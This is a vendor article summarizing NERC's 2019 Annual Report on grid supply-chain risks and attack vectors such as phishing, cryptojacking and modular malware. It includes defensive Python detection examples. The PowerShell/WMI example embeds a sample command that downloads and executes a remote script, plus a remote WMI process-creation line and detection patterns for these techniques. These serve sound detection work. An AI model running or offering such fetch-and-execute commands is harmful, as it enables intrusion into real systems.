On February 7, 2020, NERC published the 2019 Annual Report which provides a thorough overview of the work done by the Electric Reliability Organization (ERO) Enterprise and throughout the industry to assure the reliability and security of the grid in the face of a changing ecosystem.

The report is a very helpful resource for all industry-related cybersecurity experts, as it provides insight into developments affecting the operation of the electric grid in North America (US and Canada). This article summarizes the key takeaways of the report, focusing on supply chain risks and cybersecurity attack vectors.

The ERO Mission and Strategy

The Electric Reliability Organization (ERO) Enterprise, which consists of the North American Electric Reliability Corporation (NERC) and six Regional Entities, serves to strengthen the electric grid for the benefit of nearly 400 million North American citizens.

“Assuring a highly reliable and secure grid is NERC’s continuous mission. Electricity is essential to the quality of our 21st-century lifestyle and is delivered by a complex fabric of industry participants, government partners, and nongovernmental organizations. My objective is to ensure that the ERO Enterprise plays its part in strengthening that fabric for the benefit of all North Americans,” notes Jim Robb, President and CEO, NERC.

To support its mission, ERO released “The ERO Enterprise Strategy”, which serves as a guide to the why, how and what of the ERO mission.

  • The “why” is to assure a highly reliable and secure bulk power system (BPS).
  • The four major “hows” are
    • Deploying and engaging top talent and expertise,
    • Innovating our products and services and keeping risk in mind as we evolve our programs,
    • Collaborating fulsomely and effectively with industry, and
    • Maintaining our independence and objectivity.
  • The “what” is executing ERO Enterprise programs effectively, efficiently, and collaboratively to achieve greater consistency, equity, and impact with all of our program activities.

The ERO Strategic Plan focuses on five key areas:

  • Expand a risk-based focus in regulatory activities to ensure mitigation of real risks to reliability and security
  • Ensure actions are in place to mitigate known risks and better understand emerging risks to reliability and security
  • Build a strong security capability for industry centered around the Electricity Information Sharing and Analysis Center (E-ISAC)
  • Strengthen the outreach and engagement across the reliability and security ecosystem in North America to ensure the work is relevant and impactful to decision makers, whether they be utility planners, control operators, regulators, security professionals, or policymakers
  • Pursue continuous improvement in the effectiveness and efficiency of activities

The ERO Enterprise assures North American BPS reliability primarily through the identification, prioritization, and effective and efficient mitigation of risks. By maintaining a risk-based focus in its operations, the ERO Enterprise is able to apply resources to the most significant reliability risks and better respond to emerging risks.

Supply Chain Risks

The supply chains for information and communications technology as well as industrial control systems may provide various opportunities for compromise, thereby presenting risks to Bulk Electric System (BES) security.

The Supply Chain Standards (CIP-013-1, CIP-010-3, CIP-005-6) require responsible entities that possess medium- and high-impact BES cyber systems to develop processes to ensure that supply chain risks are being managed through the procurement process. Consistent with the risk-based framework of the NERC CIP Reliability Standards, the Supply Chain Standards are applicable to the highest risk systems with the greatest impact to the grid.

In May, the NERC Board of Trustees (Board) accepted NERC’s Cyber Security Supply Chain Risks report, which provided an analysis of best practices and standards in other industries to mitigate supply chain risks. In particular, the report documented the results of the evaluation of supply chain risks associated with certain categories of assets not currently subject to the Supply Chain Standards, and recommended actions to address those risks. The following paragraphs detail these categories of assets.

Electronic Access Control Monitoring Systems

More specifically, the report addressed the reliability risks associated with the supply chain for Electronic Access Control or Monitoring Systems (EACMS), which are not currently subject to the Supply Chain Standards. The components that make up EACMS are typically used to control access to, secure, and monitor critical systems on the BES, such as EMS/SCADA and microprocessor-based relays.

Although the CIP Reliability Standards currently contain protections for EACMS, these protections do not extend to risks specific to the supply chain. If compromised, misused, or rendered unavailable, EACMS components could have a real-time impact on the reliability of the BES. The risks posed by supply chain vulnerabilities depend in large part on the specific configuration of the EACMS, where the EACMS is deployed (i.e., at low, medium, or high impact BES cyber system), and the extent to which certain compensating measures are employed.

Physical Access Control Systems

Further, the Supply Chain Risks report addressed the reliability risks for Physical Access Control Systems (PACS), which are not currently subject to the Supply Chain Standards. The systems that make up PACS are often used to control and monitor physical access to facilities and systems on the BES where BES cyber systems reside. These include physical intrusion-detection systems, log monitors, and systems to control physical access. Examples of PACS cyber asset types include authentication servers, card systems, and badge control systems.

PACS are potentially vulnerable to risks from the supply chain. If compromised, misused, or rendered unavailable, PACS components could have a real-time impact on the reliability of the BES. Compromise of the cyber systems that perform monitoring, while presenting a lower risk, could impair the ability to quickly analyze an attack and may mask real-time access alarms from those who are actively assessing reliability. Compromised PACS monitoring systems may also eliminate the entity’s ability to detect illicit access to Facilities and their associated BES cyber systems.

Low Impact BES Cyber Systems

The Supply Chain Standards are applicable only to high and medium impact BES cyber systems. Low impact BES Cyber Systems generally comprise the same types of cyber assets as those in high and medium impact systems and are therefore subject to similar supply chain risks. However, individually they present a lower risk to BES reliability if they are compromised. Examples of such supply chain risks include the introduction of malicious code in the supply chain and vendor employees who have remote access into the entity’s systems.

Although the compromise of an individual low impact BES cyber system would, by definition, not pose a risk to reliability, there may be potential negative impacts on reliability if numerous low impact systems were compromised. This could happen if a major vendor with a sizable market share unintentionally supplied a compromised product to a sizable percentage of the industry, and a malicious actor then exploited the single configuration-based vulnerability across a number of devices. Viruses, worms, and malware programs target “common mode vulnerabilities” in this manner.

There is also a second potential risk associated with low impact BES Cyber Systems, particularly those owned by an entity that also owns high or medium systems. The risk is that a malicious actor could target the supply chain for a low impact BES Cyber System and exploit that vulnerability to attack other systems owned by the same entity, including high and medium BES Cyber Systems at larger and more critical BES Facilities.

As a result of the above-mentioned analysis, the Supply Chain Risks report recommends that the Supply Chain Standards should be modified to include electronic and physical access controls for medium- and high-impact BES cyber systems, as well as low impact BES cyber systems.

State of Reliability

NERC issues an annual, independent assessment of BPS performance that informs regulators, policymakers, and industry leaders of reliability and performance trends, needed actions to address known and emerging risks, and whether mitigations have led to positive improvements on the system.

Ongoing performance measures show positive trends in generation, transmission, and protection and control performance. However, NERC’s 2019 State of Reliability encouraged continued vigilance as the evolving resource mix and cyber and physical security threats continue to present critical challenges.

Cybersecurity issues remain a priority for NERC since cyber threats are becoming more sophisticated and increasing in number. The exploitation of cyber vulnerabilities can result in loss of control or damage to utility voice communications, data, monitoring, protection and control systems, and tools. The potential for a cyber or physical attack on natural gas infrastructure highlights the need for increased coordination to improve response and recovery times due to the interdependency of the natural gas and electricity system. Interdependency and increased reliance on third-party service providers, cloud-based services, and the supply chain expands the attack surface and associated risk for potential cyber vulnerabilities. The increasing digitization of the distribution system and internet-connected loads further expands the attack surface physically and logically, increasing risk to the BPS.

The State of Reliability report identifies three attack vectors:

  • Trusted third-party phishing emails
  • Cryptojacking and malware
  • Malware frameworks (like Shamoon or GreyEnergy)

Trusted Third-Party Phishing

One of the most common cyber attacks was phishing emails received through trusted third parties (e.g., law firms, suppliers, solution providers) where the IT networks were compromised. In fact, the Wall Street Journal reported recently that approximately 60 utilities were targeted using phishing emails from existing trusted relationships, about two dozen were breached, and the attackers reached industrial control systems in at least eight of those cases.

The phishing emails are typically sent to the third-party victim’s contact list or as a reply to the most recent conversations to increase the likelihood the recipient will believe the email came from a trusted source. Since the source is a seemingly legitimate organization, security solutions that perform anti-spoofing or spam filtering are less effective. While this type of phishing is prolific, it usually has little more sophistication than normal spam phishing.
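The point above is that sender-based defenses pass because the partner mailbox really did send the mail. The following added example (not from the NERC report or this article) models that gap in Python: a sender-domain check that a message from a compromised partner passes, followed by content checks that do not depend on who sent it. The partner domain `example-law.test`, the link hosts, the attachment extension list and both messages are constructed placeholders.

```python
"""Content checks for mail that arrives from a genuinely trusted sender.

Added example; all domains, addresses and messages are constructed.
"""
import re
from email.message import EmailMessage
from urllib.parse import urlparse

# Constructed allowlists standing in for a mail gateway's configuration.
TRUSTED_SENDER_DOMAINS = {"example-law.test"}
KNOWN_GOOD_LINK_HOSTS = {"portal.example-law.test"}
RISKY_ATTACHMENT_EXT = {".doc", ".docm", ".xls", ".xlsm", ".js", ".vbs", ".lnk", ".iso"}
URL_RE = re.compile(r'https?://[^\s"\'<>)]+')


def make_message(sender, subject, body, in_reply_to=None, attachment_name=None):
    """Build a constructed sample message (optionally with an attachment)."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "ops@utility.test"
    msg["Subject"] = subject
    if in_reply_to:
        msg["In-Reply-To"] = in_reply_to
    msg.set_content(body)
    if attachment_name:
        msg.add_attachment(b"\x00" * 16, maintype="application",
                           subtype="octet-stream", filename=attachment_name)
    return msg


def sender_domain(msg):
    return msg["From"].split("@")[-1].strip("<> ").lower()


def passes_sender_checks(msg):
    """Stand-in for the anti-spoofing layer: is the sending domain trusted?
    Mail sent from a compromised partner mailbox passes this check."""
    return sender_domain(msg) in TRUSTED_SENDER_DOMAINS


def content_flags(msg):
    """Sender-independent checks: thread headers, link hosts, attachments."""
    flags = []
    subject = (msg["Subject"] or "").strip().lower()
    # A "RE:" subject with no threading headers is a common sign of a
    # forged reply that was never part of a real conversation.
    if subject.startswith(("re:", "fw:", "fwd:")) and not (msg["In-Reply-To"] or msg["References"]):
        flags.append("reply-subject-without-thread-headers")
    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part else ""
    sdom = sender_domain(msg)
    for url in URL_RE.findall(body):
        host = (urlparse(url).hostname or "").lower()
        if host in KNOWN_GOOD_LINK_HOSTS or host == sdom or host.endswith("." + sdom):
            continue
        flags.append("link-to-unfamiliar-host:" + host)
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if any(name.endswith(ext) for ext in RISKY_ATTACHMENT_EXT):
            flags.append("risky-attachment:" + name)
    return flags


# Constructed samples: a real reply from the partner, and a message from the
# same (compromised) mailbox that only looks like a reply.
LEGIT = make_message("counsel@example-law.test", "Re: contract renewal",
                     "Updated draft is on https://portal.example-law.test/docs/123",
                     in_reply_to="<20200203.1@utility.test>")
SUSPECT = make_message("counsel@example-law.test", "RE: contract renewal",
                       "Please review the invoice at https://invoice-review.example-cdn.test/open",
                       attachment_name="Invoice_0219.docm")

if __name__ == "__main__":
    for label, m in (("legit", LEGIT), ("suspect", SUSPECT)):
        print(label, passes_sender_checks(m), content_flags(m))
```

Both messages pass the sender check; only the content checks separate them. In practice these flags feed a quarantine or user-warning decision rather than a hard block, since partners do occasionally send new links and Office attachments.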

Cryptojacking and Ransomware

Financially motivated criminals shifted focus from ransomware to crypto-jacking mainly because ransomware is quick and easy to detect due to its disruptive nature. To continue to bypass automated security systems, new ransomware variants must be continually developed. Comparatively, crypto-jacking incidents typically seek to avoid detection by using only a small portion of the victim’s computer processing power to mine currency.

While most crypto-jacking infections will not make the target system unusable, infected hosts are still negatively impacted. Prolonged operations of crypto-miners can burn out components, requiring more frequent replacement, and some crypto-jacking malware ignores stealth and uses all available processing power, effectively causing a denial-of-service condition on the system.
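Because a stealthy miner deliberately stays at a modest CPU share, a threshold on peak usage alone misses it; what stands out is that an unrecognized process is busy in almost every sample. The following added example (not from the report or this article) applies that idea in Python to constructed per-process CPU samples: it allowlists known processes, then flags unknown ones that are persistently busy and labels them "stealthy" or "saturating" by mean CPU. Host names, process names and the three thresholds are assumptions.

```python
"""Persistence-based detection of miner-like CPU consumers.

Added example; the samples are constructed, not real telemetry.
"""
from collections import defaultdict

KNOWN_PROCESSES = {"ScadaView.exe", "svchost.exe", "explorer.exe"}  # assumed allowlist
CPU_BUSY_PCT = 5.0        # a sample counts as "busy" above this share
PERSISTENCE = 0.9         # fraction of samples that must be busy
SATURATION_PCT = 80.0     # mean CPU above this is the noisy, DoS-like profile


def build_samples():
    """Constructed (minute, host, process, cpu_percent) records over 12 minutes."""
    samples = []
    for minute in range(12):
        samples.append((minute, "hmi-03", "ScadaView.exe", 20 + minute % 5))         # known, sustained
        samples.append((minute, "hmi-03", "svchost.exe", 1 + minute % 3))             # known, idle
        samples.append((minute, "hmi-03", "wuauserv_helper.exe", 12 + minute % 3))    # unknown, ~13% always
        samples.append((minute, "eng-ws-11", "explorer.exe", 2))                      # known, idle
        samples.append((minute, "eng-ws-11", "setup_tmp.exe", 40 if minute == 4 else 0))  # unknown, one spike
        samples.append((minute, "eng-ws-11", "updater32.exe", 97 + minute % 3))       # unknown, pegged
    return samples


def find_persistent_consumers(samples, known=KNOWN_PROCESSES):
    """Return {(host, process): finding} for unknown processes that are busy
    in at least PERSISTENCE of their samples, regardless of how high."""
    by_proc = defaultdict(list)
    for _, host, proc, cpu in samples:
        by_proc[(host, proc)].append(cpu)
    findings = {}
    for (host, proc), cpus in by_proc.items():
        if proc in known:
            continue
        busy_fraction = sum(c >= CPU_BUSY_PCT for c in cpus) / len(cpus)
        if busy_fraction < PERSISTENCE:
            continue  # a single spike (installer, scan) is not a miner pattern
        mean_cpu = sum(cpus) / len(cpus)
        findings[(host, proc)] = {
            "mean_cpu": round(mean_cpu, 1),
            "busy_fraction": round(busy_fraction, 2),
            "profile": "saturating" if mean_cpu >= SATURATION_PCT else "stealthy",
        }
    return findings


if __name__ == "__main__":
    for key, finding in find_persistent_consumers(build_samples()).items():
        print(key, finding)
```

The allowlist is what keeps a legitimately busy HMI application out of the results; in a real deployment it would be derived from a software inventory rather than typed in, and the "stealthy" findings are the ones worth correlating with outbound connections to mining pools.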

Malware Frameworks

Each time a new malware framework is discovered, the E-ISAC works with a variety of government and private sector partners to deliver actionable and timely information to the industry. The threat, however, is clear: advanced attackers continue to develop highly modular tools with the ability to greatly impact a targeted system.

Modular malware allows attackers faster development time and the ability to avoid analyst scrutiny. Instead of having to rewrite large swaths of code every time the malware’s functionality needs to be changed or a new system is targeted, the developers are compartmentalizing malware into functional pieces that can be easily swapped out. This also allows attackers to only deliver the final payload of the malware right before it is to be executed on the target system. If an entity discovers the malware before this time, defenders are left without the context behind the attack; likewise, unused modules remain viable for future use.

While modular malware is not new, it is becoming increasingly popular across all attacker skill levels. Criminal organizations are increasingly using common malware, like Emotet and Pony Loader, to perform initial infections and then delivering the intended payload after establishing a foothold in a system. While highly specialized tools, like GreyEnergy and TRISIS, can allow advanced threat actors to impact specific systems, hiding behind common malware like Emotet can make differentiating hostile activity from standard operations more difficult.

Assessment

The State of Reliability report provides an assessment of the continuing cyber threats which include the following:

Supply Chain: The supply chains for IT and ICS may provide various opportunities for adversaries to initiate cyber-attacks. For example, recent incidents, such as those reported by WSJ, have demonstrated that nation-state adversaries are targeting the electric grid industry and other industries by compromising the networks of third parties with which the intended targets have established business relationships.

Credential Harvesting: Tactics to acquire legitimate user credentials to gain initial access to targeted networks and establish persistence mechanisms will continue to be popular because they help actors evade detection. Sophisticated spear phishing activity to harvest credentials is the most common technique observed by members.

Network Device Targeting: Switches and routers located on the edge of networks are a prime target for threat actors capable of intercepting and processing a large amount of information. Because these devices are placed at the boundary between internal networks and the internet and allow controlled access to the internal network, they will most likely continue to be a target of reconnaissance.

Use of Native Tools: Adversaries will likely continue to use tools and capabilities already present on a compromised network, such as PowerShell or Windows Management Infrastructure, to conduct reconnaissance, lateral movement, and privilege escalation. The presence or use of these tools on a targeted network is unlikely to raise alarm, so their inappropriate use helps evade detection.
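Since the presence of PowerShell or WMI is normal, detection has to key on how they are invoked rather than on the tool itself. The following added example (not from the report or this article) shows that in Python over constructed process-creation records in a JSON format loosely modeled on Sysmon fields: a small rule set for suspicious PowerShell switches and remote WMI process creation, plus decoding of `-EncodedCommand` payloads so the rules can be re-applied to what the command actually runs. The record layout, rule names, host names and all three sample records are assumptions.

```python
"""Command-line rules for native-tool abuse, applied to constructed records.

Added example; the log records are built inline and are not real events.
"""
import base64
import json
import re

# (rule name, pattern) pairs. Case-insensitive because PowerShell is.
RULES = [
    ("encoded-command", re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("web-download", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I)),
    ("invoke-expression", re.compile(r"\biex\b|Invoke-Expression", re.I)),
    ("execution-policy-bypass", re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)),
    ("hidden-window", re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)),
    ("wmi-remote-process", re.compile(
        r"\bwmic(?:\.exe)?\s+/node:|Invoke-WmiMethod.*-ComputerName|Invoke-CimMethod.*-ComputerName", re.I)),
]
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record):
    """Return the rule names that match a record's command line, including
    rules that only match after decoding an encoded payload."""
    cmd = record.get("CommandLine", "")
    hits = [name for name, rx in RULES if rx.search(cmd)]
    decoded = decode_encoded_command(cmd)
    if decoded:
        hits += ["decoded:" + name for name, rx in RULES
                 if name != "encoded-command" and rx.search(decoded)]
    return hits


def triage(lines):
    """Map RecordId -> hits for every JSON record that trips at least one rule."""
    results = {}
    for line in lines:
        rec = json.loads(line)
        hits = analyze(rec)
        if hits:
            results[rec["RecordId"]] = hits
    return results


# Constructed sample records. The encoded payload is built here so the
# example stays readable; 203.0.113.5 is a documentation-range address.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/u.ps1')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_LOG = [
    json.dumps({"RecordId": 1, "User": "UTIL\\svc_backup",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": "powershell.exe -File C:\\Scripts\\Backup-Config.ps1"}),
    json.dumps({"RecordId": 2, "User": "UTIL\\jdoe",
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {_ENC}"}),
    json.dumps({"RecordId": 3, "User": "UTIL\\jdoe",
                "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
                "CommandLine": 'wmic /node:HMI-07 process call create "cmd.exe /c whoami"'}),
]

if __name__ == "__main__":
    for rid, hits in triage(SAMPLE_LOG).items():
        print(rid, hits)
```

The scheduled backup script in record 1 produces no hits, which is the point: the same binary is benign or suspicious depending on its switches and arguments. Decoding the payload is what turns record 2 from "someone used an encoded command" into "a hidden PowerShell fetched and executed remote code", and the decoded text is what an analyst needs to see in the alert.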

Conclusion

The NERC 2019 Annual Report and the associated Supply Chain Risks and State of Reliability reports are excellent resources for all electric grid facilities, providing enhanced awareness of the issues pertaining to the industry. ITEGRITI can help entities mitigate the cyber threats and risks referred to in these reports with programs that are supported by internal controls which measure, monitor, and report ongoing program effectiveness. Contact the experts to learn how.